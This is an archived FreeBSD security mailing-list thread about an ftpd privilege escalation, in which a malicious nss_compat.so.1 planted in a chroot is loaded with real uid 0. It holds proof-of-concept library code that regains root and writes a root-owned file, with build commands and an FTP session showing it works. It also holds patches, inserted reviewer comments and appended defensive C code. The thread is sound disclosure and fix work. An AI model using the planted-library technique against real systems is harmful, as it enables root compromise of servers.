From owner-freebsd-security@FreeBSD.ORG Wed Nov 30 20:00:23 2011
Message-ID: <4ED68B4D.4020004@sentex.net>
Date: Wed, 30 Nov 2011 15:00:13 -0500
From: Mike Tancsa
Organization: Sentex Communications
To: freebsd-security@freebsd.org
Subject: ftpd security issue ?

Saw this on FD... Anyone know any more details about this ?

http://lists.grok.org.uk/pipermail/full-disclosure/2011-November/084372.html

---Mike

-- 
-------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications, mike@sentex.net
Providing Internet services since 1994 www.sentex.net
Cambridge, Ontario Canada http://www.tancsa.com/

From owner-freebsd-security@FreeBSD.ORG Wed Nov 30 21:09:17 2011
Message-ID: <4ED69B7E.50505@frasunek.com>
Date: Wed, 30 Nov 2011 22:09:18 +0100
From: Przemyslaw Frasunek
Organization: frasunek.com
To: Mike Tancsa
Cc: freebsd-security@freebsd.org
References: <4ED68B4D.4020004@sentex.net>
In-Reply-To: <4ED68B4D.4020004@sentex.net>
Subject: Re: ftpd security issue ?

> Saw this on FD... Anyone know any more details about this ?
> http://lists.grok.org.uk/pipermail/full-disclosure/2011-November/084372.html

This is a well known hazard of chrooting to directories controlled by
unprivileged users. In this case, the vulnerability exists because ftpd
calls /bin/ls with uid=0 and euid!=0 when the STAT command is issued, and
nss_compat.so is loaded by libc regardless of elevated privileges.

This can be proven by creating a dummy ~/lib/nss_compat.so.1:

[venglin@lagoon ~/lib]$ cat dummy.c
#include <stdio.h>
#include <unistd.h>

/* Library initializer: runs inside whatever process libc loads this
   fake NSS module into, and records that process's real and effective
   uid. */
void _init() {
	FILE *fp = fopen("asdf", "w+");
	fprintf(fp, "%d %d\n", getuid(), geteuid());
	fclose(fp);
}
[venglin@lagoon ~/lib]$ cc -o dummy.o -c dummy.c -fPIC
[venglin@lagoon ~/lib]$ cc -shared -Wl,-soname,dummy.so -o dummy.so dummy.o -nostartfiles
[venglin@lagoon ~/lib]$ mv dummy.so nss_compat.so.1

And after calling the STAT command:

[venglin@lagoon ~/lib]$ cat ~/asdf
0 3000

BTW. This vulnerability affects only configurations where /etc/ftpchroot
exists or the anonymous user is allowed to create files inside the etc
and lib dirs.
-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com ** NICHDL: PMF9-RIPE *
* Jabber ID: venglin@nette.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ5JIV *

From owner-freebsd-security@FreeBSD.ORG Thu Dec 1 00:01:11 2011
Message-ID: <4ED6C3C6.5030402@delphij.net>
Date: Wed, 30 Nov 2011 16:01:10 -0800
From: Xin LI
Organization: The FreeBSD Project
Reply-To: d@delphij.net
To: Przemyslaw Frasunek
Cc: freebsd-security@freebsd.org
References: <4ED68B4D.4020004@sentex.net> <4ED69B7E.50505@frasunek.com>
In-Reply-To: <4ED69B7E.50505@frasunek.com>
Subject: Re: ftpd security issue ?

On 11/30/11 13:09, Przemyslaw Frasunek wrote:
>> Saw this on FD... Anyone know any more details about this ?
>> http://lists.grok.org.uk/pipermail/full-disclosure/2011-November/084372.html
>
> This is a well known hazard of chrooting to directories controlled
> by unprivileged users. In this case, the vulnerability exists because
> ftpd calls /bin/ls with uid=0 and euid!=0 when the STAT command is
> issued, and nss_compat.so is loaded by libc regardless of elevated
> privileges.
>
> This can be proven by creating a dummy ~/lib/nss_compat.so.1:
>
> [venglin@lagoon ~/lib]$ cat dummy.c
> #include <stdio.h>
> #include <unistd.h>
>
> void _init() {
> 	FILE *fp = fopen("asdf", "w+");
> 	fprintf(fp, "%d %d\n", getuid(), geteuid());
> }
> [venglin@lagoon ~/lib]$ cc -o dummy.o -c dummy.c -fPIC
> [venglin@lagoon ~/lib]$ cc -shared -Wl,-soname,dummy.so -o dummy.so dummy.o -nostartfiles
> [venglin@lagoon ~/lib]$ mv dummy.so nss_compat.so.1
>
> And after calling the STAT command:
>
> [venglin@lagoon ~/lib]$ cat ~/asdf
> 0 3000
>
> BTW. This vulnerability affects only configurations where
> /etc/ftpchroot exists or the anonymous user is allowed to create files
> inside the etc and lib dirs.

This doesn't seem to be a typical configuration, or no?

Will the attached patch fix the problem?

(I think libc should just refuse /etc/nsswitch.conf and libraries if
they are writable by others, by the way)

Cheers,
-- 
Xin LI    https://www.delphij.net/
FreeBSD - The Power to Serve!    Live free or die

[attachment: popen.diff]
Index: libexec/ftpd/popen.c
===================================================================
--- libexec/ftpd/popen.c	(revision 228156)
+++ libexec/ftpd/popen.c	(working copy)
@@ -157,6 +157,7 @@ ftpd_popen(char *program, char *type)
 		}
 		exit(ls_main(gargc, gargv));
 	}
+	setuid(geteuid());
 	execv(gargv[0], gargv);
 	_exit(1);
 }

From owner-freebsd-security@FreeBSD.ORG Thu Dec 1 01:01:19 2011
Message-ID: <4ED6D1CD.9080700@sentex.net>
Date: Wed, 30 Nov 2011 20:01:01 -0500
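Review bot: the `setuid(geteuid());` is added below the `exit(ls_main(gargc, gargv));` branch visible in this hunk, so it only takes effect on the execv() path; the in-process ls_main() path, which is the one a LIST/STAT listing goes through, still runs with real uid 0, and the planted nss_compat.so.1 is loaded with root recoverable. Move the drop above the branch that dispatches to ls_main() so both paths run as the user, and check its result (`if (setuid(geteuid()) < 0) _exit(1);`) instead of carrying on when it fails.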
From: Mike Tancsa
Organization: Sentex Communications
To: d@delphij.net
Cc: freebsd-security@freebsd.org, Xin LI, Przemyslaw Frasunek
References: <4ED68B4D.4020004@sentex.net> <4ED69B7E.50505@frasunek.com> <4ED6C3C6.5030402@delphij.net>
In-Reply-To: <4ED6C3C6.5030402@delphij.net>
Subject: Re: ftpd security issue ?

On 11/30/2011 7:01 PM, Xin LI wrote:
>
>> BTW. This vulnerability affects only configurations where
>> /etc/ftpchroot exists or the anonymous user is allowed to create files
>> inside the etc and lib dirs.
>
> This doesn't seem to be a typical configuration, or no?

I think in shared hosting environments it would be somewhat common. For
anon ftp, I don't think the anon user would be able to create / write to
a lib directory.

>
> Will the attached patch fix the problem?
>
> (I think libc should just refuse /etc/nsswitch.conf and libraries if
> they are writable by others, by the way)

It does not seem to prevent the issue for me. Using Przemyslaw's program,

#include <stdio.h>
#include <unistd.h>

/* Library initializer: the loading process still has real uid 0, so
   setuid(0)/setgid(0) make it fully root before the file is created. */
void _init() {
	setuid(0);
	setgid(0);
	FILE *fp = fopen("/newfile", "w+");
	fprintf(fp, "%d %d\n", getuid(), geteuid());
	fclose(fp);
}

cc -o dummy.o -c dummy.c -fPIC ; cc -shared -Wl,-soname,dummy.so -o dummy.so dummy.o -nostartfiles ; mv dummy.so ~testuser/lib/nss_compat.so.1 ; chown testuser ~testuser/lib/nss_compat.so.1

ftp localhost
Trying 127.0.0.1...
Connected to localhost.
220 vmtest.localdomain FTP server (Version 6.00LS) ready.
Name (localhost:mdtancsa): testuser
331 Password required for testuser.
Password:
230 User testuser logged in, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||62436|)
150 Opening ASCII mode data connection for '/bin/ls'.
total 106
-rw-r--r--  1 1002  1002    763 Nov 30 15:17 .cshrc
-rw-------  1 1002  1002    193 Nov 30 16:36 .history
drwxr-xr-x  2 1002  1002    512 Nov 30 16:05 etc
-r-xr-xr-x  1 0     1002  95076 Nov 30 19:50 ftpd
drwxr-xr-x  2 1002  1002    512 Nov 30 19:56 lib
-rw-r--r--  1 0     1002     79 Nov 30 16:34 t.c
-rwxr-xr-x  1 0     1002     24 Nov 30 16:37 t.sh
226 Transfer complete.
ftp> dir
229 Entering Extended Passive Mode (|||50577|)
150 Opening ASCII mode data connection for '/bin/ls'.
total 108
-rw-r--r--  1 1002  1002    763 Nov 30 15:17 .cshrc
-rw-------  1 1002  1002    193 Nov 30 16:36 .history
drwxr-xr-x  2 1002  1002    512 Nov 30 16:05 etc
-r-xr-xr-x  1 0     1002  95076 Nov 30 19:50 ftpd
drwxr-xr-x  2 1002  1002    512 Nov 30 19:56 lib
-rw-r--r--  1 0     1002      4 Nov 30 19:58 newfile
-rw-r--r--  1 0     1002     79 Nov 30 16:34 t.c
-rwxr-xr-x  1 0     1002     24 Nov 30 16:37 t.sh
226 Transfer complete.
ftp>

the file created is root

-- 
-------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications, mike@sentex.net
Providing Internet services since 1994 www.sentex.net
Cambridge, Ontario Canada http://www.tancsa.com/

From owner-freebsd-security@FreeBSD.ORG Thu Dec 1 01:16:40 2011
Message-ID: <4ED6D577.9010007@delphij.net>
Date: Wed, 30 Nov 2011 17:16:39 -0800
From: Xin LI
Organization: The FreeBSD Project
Reply-To: d@delphij.net
To: Mike Tancsa
Cc: freebsd-security@freebsd.org, d@delphij.net, Przemyslaw Frasunek
References: <4ED68B4D.4020004@sentex.net> <4ED69B7E.50505@frasunek.com> <4ED6C3C6.5030402@delphij.net> <4ED6D1CD.9080700@sentex.net>
In-Reply-To: <4ED6D1CD.9080700@sentex.net>
Subject: Re: ftpd security issue ?

On 11/30/11 17:01, Mike Tancsa wrote:
> On 11/30/2011 7:01 PM, Xin LI wrote:
>>
>>> BTW. This vulnerability affects only configurations where
>>> /etc/ftpchroot exists or the anonymous user is allowed to create
>>> files inside the etc and lib dirs.
>>
>> This doesn't seem to be a typical configuration, or no?
>
> I think in shared hosting environments it would be somewhat common.
> For anon ftp, I don't think the anon user would be able to create /
> write to a lib directory.
>
>>
>> Will the attached patch fix the problem?
>>
>> (I think libc should just refuse /etc/nsswitch.conf and libraries
>> if they are writable by others, by the way)
>
> It does not seem to prevent the issue for me. Using Przemyslaw's
> program,

Sorry, I patched at the wrong place; this one should do.

Note however this is not sufficient to fix the problem, for instance
one can still upload .so's that run arbitrary code at his privilege,
which has to be addressed in libc. I need some time to play around
with libc to really fix this one.

Cheers,
-- 
Xin LI    https://www.delphij.net/
FreeBSD - The Power to Serve!    Live free or die

[attachment: popen.diff]
Index: libexec/ftpd/popen.c
===================================================================
--- libexec/ftpd/popen.c	(revision 228164)
+++ libexec/ftpd/popen.c	(working copy)
@@ -143,6 +143,9 @@
 		}
 		(void)close(pdes[1]);
 	}
+	/* Drop privileges before proceeding */
+	if (getuid() != geteuid() && setuid(geteuid()) < 0)
+		_exit(1);
 	if (strcmp(gargv[0], _PATH_LS) == 0) {
 		/* Reset getopt for ls_main() */
 		optreset = optind = optopt = 1;

From owner-freebsd-security@FreeBSD.ORG Thu Dec 1 01:30:02 2011
Date: Thu, 1 Dec 2011 03:10:55 +0200
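Review bot: the new check drops the uid only; the PoC posted earlier in the thread also calls setgid(0), so the group side deserves the same treatment next to it, e.g. `if (getgid() != getegid() && setgid(getegid()) < 0) _exit(1);` placed ahead of the setuid() (the gid change needs the uid still in place), plus a setgroups() to clear any supplementary groups while that is still permitted. The comment `/* Drop privileges before proceeding */` could also say why setuid() rather than seteuid() is the right call here: on FreeBSD, setuid() to the current effective uid is permitted and rewrites the real and saved uid as well, which is exactly what stops a loaded .so from calling setuid(0) afterwards.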
From: Titus Manea
To: freebsd-security@freebsd.org
Message-ID: <20111201031055.A67122@buko.edc.ro>
References: <4ED68B4D.4020004@sentex.net> <4ED69B7E.50505@frasunek.com> <4ED6C3C6.5030402@delphij.net> <4ED6D1CD.9080700@sentex.net>
In-Reply-To: <4ED6D1CD.9080700@sentex.net>; from mike@sentex.net on Wed, Nov 30, 2011 at 08:01:01PM -0500
Subject: Re: ftpd security issue ?

Move the seteuid

	pid = (strcmp(gargv[0], _PATH_LS) == 0) ? fork() : vfork();
	switch(pid) {
	case -1:			/* error */
		(void)close(pdes[0]);
		(void)close(pdes[1]);
		goto pfree;
		/* NOTREACHED */
	case 0:				/* child */
		setuid(geteuid());

On Wed, Nov 30, 2011 at 08:01:01PM -0500, Mike Tancsa wrote:
> On 11/30/2011 7:01 PM, Xin LI wrote:
> >
> >> BTW. This vulnerability affects only configurations where
> >> /etc/ftpchroot exists or the anonymous user is allowed to create files
> >> inside the etc and lib dirs.
> >
> > This doesn't seem to be a typical configuration, or no?
>
> I think in shared hosting environments it would be somewhat common. For
> anon ftp, I don't think the anon user would be able to create / write to
> a lib directory.
>
> >
> > Will the attached patch fix the problem?
> >
> > (I think libc should just refuse /etc/nsswitch.conf and libraries if
> > they are writable by others, by the way)
>
> It does not seem to prevent the issue for me.
> Using Przemyslaw's program,
>
> #include <stdio.h>
> #include <unistd.h>
>
> void _init() {
> 	setuid(0);
> 	setgid(0);
> 	FILE *fp = fopen("/newfile", "w+");
> 	fprintf(fp, "%d %d\n", getuid(), geteuid());
> }
>
> cc -o dummy.o -c dummy.c -fPIC ; cc -shared -Wl,-soname,dummy.so -o
> dummy.so dummy.o -nostartfiles ; mv dummy.so
> ~testuser/lib/nss_compat.so.1 ; chown testuser ~testuser/lib/nss_compat.so.1
>
>
> ftp localhost
> Trying 127.0.0.1...
> Connected to localhost.
> 220 vmtest.localdomain FTP server (Version 6.00LS) ready.
> Name (localhost:mdtancsa): testuser
> 331 Password required for testuser.
> Password:
> 230 User testuser logged in, access restrictions apply.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> dir
> 229 Entering Extended Passive Mode (|||62436|)
> 150 Opening ASCII mode data connection for '/bin/ls'.
> total 106
> -rw-r--r--  1 1002  1002    763 Nov 30 15:17 .cshrc
> -rw-------  1 1002  1002    193 Nov 30 16:36 .history
> drwxr-xr-x  2 1002  1002    512 Nov 30 16:05 etc
> -r-xr-xr-x  1 0     1002  95076 Nov 30 19:50 ftpd
> drwxr-xr-x  2 1002  1002    512 Nov 30 19:56 lib
> -rw-r--r--  1 0     1002     79 Nov 30 16:34 t.c
> -rwxr-xr-x  1 0     1002     24 Nov 30 16:37 t.sh
> 226 Transfer complete.
> ftp> dir
> 229 Entering Extended Passive Mode (|||50577|)
> 150 Opening ASCII mode data connection for '/bin/ls'.
> total 108
> -rw-r--r--  1 1002  1002    763 Nov 30 15:17 .cshrc
> -rw-------  1 1002  1002    193 Nov 30 16:36 .history
> drwxr-xr-x  2 1002  1002    512 Nov 30 16:05 etc
> -r-xr-xr-x  1 0     1002  95076 Nov 30 19:50 ftpd
> drwxr-xr-x  2 1002  1002    512 Nov 30 19:56 lib
> -rw-r--r--  1 0     1002      4 Nov 30 19:58 newfile
> -rw-r--r--  1 0     1002     79 Nov 30 16:34 t.c
> -rwxr-xr-x  1 0     1002     24 Nov 30 16:37 t.sh
> 226 Transfer complete.
> ftp>
>
> the file created is root
>
>
> -- 
> -------------------
> Mike Tancsa, tel +1 519 651 3400
> Sentex Communications, mike@sentex.net
> Providing Internet services since 1994 www.sentex.net
> Cambridge, Ontario Canada http://www.tancsa.com/

-- 
---------------------------------------------------------------------
How an engineer writes a program: Starts by debugging an empty file...
Titus Manea | Eastern Digital Inc.

From owner-freebsd-security@FreeBSD.ORG Thu Dec 1 01:38:13 2011
Message-ID: <4ED6DA75.30604@sentex.net>
Date: Wed, 30 Nov 2011 20:37:57 -0500
From: Mike Tancsa
Organization: Sentex Communications
To: d@delphij.net
Cc: freebsd-security@freebsd.org, Xin LI, Przemyslaw Frasunek
References: <4ED68B4D.4020004@sentex.net> <4ED69B7E.50505@frasunek.com> <4ED6C3C6.5030402@delphij.net> <4ED6D1CD.9080700@sentex.net> <4ED6D577.9010007@delphij.net>
In-Reply-To: <4ED6D577.9010007@delphij.net>
Subject: Re: ftpd security issue ?

On 11/30/2011 8:16 PM, Xin LI wrote:
>
> Sorry, I patched at the wrong place; this one should do.
>
> Note however this is not sufficient to fix the problem, for instance
> one can still upload .so's that run arbitrary code at his privilege,
> which has to be addressed in libc. I need some time to play around
> with libc to really fix this one.

Hi,

Yes, that looks better! With respect to users uploading .so files, I
guess why not just upload executables directly? Although I suppose if
they are not allowed to execute anything, this would be a way around
that.

Now to prod the proftpd folks

---Mike

-- 
-------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications, mike@sentex.net
Providing Internet services since 1994 www.sentex.net
Cambridge, Ontario Canada http://www.tancsa.com/
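Added example for this archive page; it is not ftpd's or libc's code and was not posted by anyone in the thread. It puts the two defences the messages above converge on into stand-alone C. module_is_trusted() is the check Xin LI suggests libc should apply before it loads /etc/nsswitch.conf or an NSS module: refuse a file that is group/world writable, not owned by the trusted owner, reached through a symlink, or sitting in a directory with the same weaknesses. drop_privileges_permanently() and can_regain_root() show why Przemyslaw's PoC reports "0 3000" and why Mike's version can then setuid(0): a seteuid()-only drop leaves the real and saved uid at 0, a setgid()/setuid() drop does not. The function names, the fixture files under /tmp/nsscheck.* and the use of uid/gid 65534 for "nobody" in main() are this example's own assumptions, not anything the thread specifies.

```c
#define _GNU_SOURCE 1   /* Linux: prototypes for mkdtemp(), symlink(), setgroups() */
#include <errno.h>
#include <fcntl.h>
#include <grp.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1 if PATH may be loaded as an NSS module by a privileged process: no symlink
 * at the last component, a regular file owned by trusted_owner, and neither it
 * nor its directory group/world writable (the directory owner is checked too).
 * The file is judged through the opened descriptor, so what is checked is what
 * would be mapped. *why receives a short reason for the verdict. */
int module_is_trusted(const char *path, uid_t trusted_owner, const char **why)
{
    struct stat st, dst; char dir[PATH_MAX]; size_t n;
    const char *slash = strrchr(path, '/');
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) { *why = "open failed or last component is a symlink"; return 0; }
    if (fstat(fd, &st) != 0) { close(fd); *why = "fstat failed"; return 0; }
    close(fd);
    if (!S_ISREG(st.st_mode)) { *why = "not a regular file"; return 0; }
    if (st.st_uid != trusted_owner) { *why = "file owner not trusted"; return 0; }
    if (st.st_mode & (S_IWGRP | S_IWOTH)) { *why = "file group/world writable"; return 0; }
    /* Whoever can write the directory can swap the module out: check it too. */
    if (slash == NULL) { *why = "relative path"; return 0; }
    n = (slash == path) ? 1 : (size_t)(slash - path);
    if (n >= sizeof dir) { *why = "path too long"; return 0; }
    memcpy(dir, path, n); dir[n] = '\0';
    if (stat(dir, &dst) != 0 || !S_ISDIR(dst.st_mode)) { *why = "directory unreadable"; return 0; }
    if (dst.st_uid != trusted_owner) { *why = "directory owner not trusted"; return 0; }
    if (dst.st_mode & (S_IWGRP | S_IWOTH)) { *why = "directory group/world writable"; return 0; }
    *why = "ok";
    return 1;
}

/* The drop ftpd's child needed before running ls: setgid()/setuid() rewrite the
 * real, effective AND saved ids, so a later setuid(0) from a planted library
 * fails. seteuid() alone leaves real/saved uid 0 (the "0 3000" in the thread).
 * Returns 0 on success, -1 with errno set if a step failed or did not stick. */
int drop_privileges_permanently(uid_t uid, gid_t gid)
{
    if (uid == 0) { errno = EINVAL; return -1; }               /* root is no drop */
    if (geteuid() == 0 && setgroups(1, &gid) != 0) return -1;  /* root-only: do first */
    if (setgid(gid) != 0 || setuid(uid) != 0) return -1;
    if (getuid() != uid || geteuid() != uid || getgid() != gid || getegid() != gid) { errno = EPERM; return -1; }
    if (seteuid(0) == 0 || setegid(0) == 0) { errno = EPERM; return -1; } /* must fail now */
    return 0;
}

/* 1 if setuid(0) still works, i.e. the process is root-capable whatever its
 * effective uid says; the effective uid is restored so the caller is undisturbed. */
int can_regain_root(void)
{
    uid_t euid = geteuid();
    if (setuid(0) != 0) return 0;
    if (euid != 0) (void)seteuid(euid);
    return 1;
}

/* Fixtures in a fresh /tmp directory (names made up for this example). Returns 0
 * if every case came out as expected, a bitmask of the cases that did not, or -1
 * if the fixtures could not be built. */
int run_self_check(void)
{
    char dir[] = "/tmp/nsscheck.XXXXXX", good[64], loose[64], lnk[64];
    const char *why;
    uid_t me = geteuid();
    int fd, failed = 0;
    if (mkdtemp(dir) == NULL || chmod(dir, 0755) != 0) return -1;
    snprintf(good, sizeof good, "%s/nss_compat.so.1", dir);
    snprintf(loose, sizeof loose, "%s/nss_files.so.1", dir);
    snprintf(lnk, sizeof lnk, "%s/nss_dns.so.1", dir);
    if ((fd = open(good, O_WRONLY | O_CREAT | O_EXCL, 0644)) < 0) return -1; close(fd);
    if ((fd = open(loose, O_WRONLY | O_CREAT | O_EXCL, 0644)) < 0) return -1; close(fd);
    if (chmod(good, 0644) != 0 || chmod(loose, 0666) != 0 || symlink(good, lnk) != 0) return -1;
    if (module_is_trusted(good, me, &why) != 1)     failed |= 1;  /* 0644, right owner */
    if (module_is_trusted(loose, me, &why) != 0)    failed |= 2;  /* world writable */
    if (module_is_trusted(lnk, me, &why) != 0)      failed |= 4;  /* symlink planted */
    if (module_is_trusted(good, me + 1, &why) != 0) failed |= 8;  /* wrong owner */
    if (chmod(dir, 0777) != 0) return -1;
    if (module_is_trusted(good, me, &why) != 0)     failed |= 16; /* loose directory */
    unlink(lnk); unlink(loose); unlink(good); rmdir(dir);
    return failed;
}

int main(void)
{
    int rc = run_self_check();
    printf("module_is_trusted self-check: %s (mask %d)\n", rc == 0 ? "ok" : "FAILED", rc);
    if (getuid() == 0 && seteuid(65534) == 0) {   /* ftpd's state; 65534 assumed "nobody" */
        printf("seteuid() only: can_regain_root=%d\n", can_regain_root());
        (void)seteuid(0);
    }
    if (drop_privileges_permanently(getuid() ? getuid() : 65534, getuid() ? getgid() : 65534) != 0)
        return perror("drop_privileges_permanently"), 1;
    printf("setuid() drop:  can_regain_root=%d\n", can_regain_root());
    return rc == 0 ? 0 : 1;
}
```

Build with `cc -Wall -o nsscheck nsscheck.c` and run it once as a user and once as root: the root run prints can_regain_root=1 after the seteuid()-only drop and 0 after the full drop, which is the difference between the ftpd child in the thread and a child that cannot be climbed back out of. A real libc check would walk every component of the path rather than only the last directory, and on FreeBSD could hand the already-checked descriptor to fdlopen(3) so nothing can be swapped in between the check and the load.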